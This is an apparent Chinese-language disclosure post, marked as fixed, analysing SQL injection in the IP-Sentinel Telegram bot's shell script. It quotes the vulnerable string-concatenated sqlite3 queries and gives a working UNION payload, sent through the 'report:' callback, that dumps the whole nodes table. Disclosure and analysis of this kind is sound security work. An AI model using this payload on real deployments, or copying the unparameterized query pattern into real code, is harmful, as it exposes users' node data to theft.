[已修复][分析留档] IP-Sentinel 严重 SQL 注入漏洞

稍作分析

db_exec() {
    sqlite3 "$DB_FILE" "$1"
}

该函数直接将拼接后的完整 SQL 字符串交给 sqlite3，没有参数化、没有转义、没有输入校验。

注入点 1

if [[ "$TEXT" == *"#REGISTER#"* ]]; then
    REG_LINE=$(echo "$TEXT" | grep "#REGISTER#" | head -n 1 | tr -d '\` ')
    IFS='|' read -r MAGIC NODE_NAME AGENT_IP AGENT_PORT <<< "$REG_LINE"

    db_exec "INSERT INTO nodes (chat_id, node_name, agent_ip, agent_port, last_seen) VALUES ('$CHAT_ID', '$NODE_NAME', '$AGENT_IP', '$AGENT_PORT', CURRENT_TIMESTAMP) ON CONFLICT(chat_id, node_name) DO UPDATE SET agent_ip='$AGENT_IP', agent_port='$AGENT_PORT', last_seen=CURRENT_TIMESTAMP;"
fi

NODE_NAME、AGENT_IP、AGENT_PORT 完全来自 Telegram 文本，且直接进入 SQL。

注入点 2

删除逻辑位于 master/tg_master.sh:101-103：

TARGET_NODE=${TEXT#*:}
db_exec "DELETE FROM nodes WHERE chat_id='$CHAT_ID' AND node_name='$TARGET_NODE';"

TARGET_NODE 来自回调数据 del:*，同样直接拼接进 SQL。

这意味着攻击者不需要走注册入口，也可以直接通过构造 del:... 触发 SQL 注入。

注入点 3

ACTION_TYPE=$(echo "$TEXT" | cut -d':' -f1)
TARGET_NODE=$(echo "$TEXT" | cut -d':' -f2)

AGENT_INFO=$(db_exec "SELECT agent_ip, agent_port FROM nodes WHERE chat_id='$CHAT_ID' AND node_name='$TARGET_NODE' LIMIT 1;")

TARGET_NODE 依然来自 Telegram 回调数据。

实战环节：如何让 Bot 通过注入点输出其全表呢？

原始 SQL:

AGENT_INFO=$(db_exec "SELECT agent_ip, agent_port FROM nodes WHERE chat_id='$CHAT_ID' AND node_name='$TARGET_NODE' LIMIT 1;")

通过构造如下 SQL 来 dump 全表:

SELECT agent_ip, agent_port FROM nodes
WHERE chat_id='999999' AND node_name='' UNION SELECT group_concat(chat_id||char(44)||node_name||char(44)||agent_ip||char(44)||agent_port||char(44)||last_seen,char(10)),'1' FROM nodes--' LIMIT 1;

Payload 如下:

report:' UNION SELECT group_concat(chat_id||char(44)||node_name||char(44)||agent_ip||char(44)||agent_port||char(44)||last_seen,char(10)),'1' FROM nodes--

成功 dump 全表。

下面是原始帖子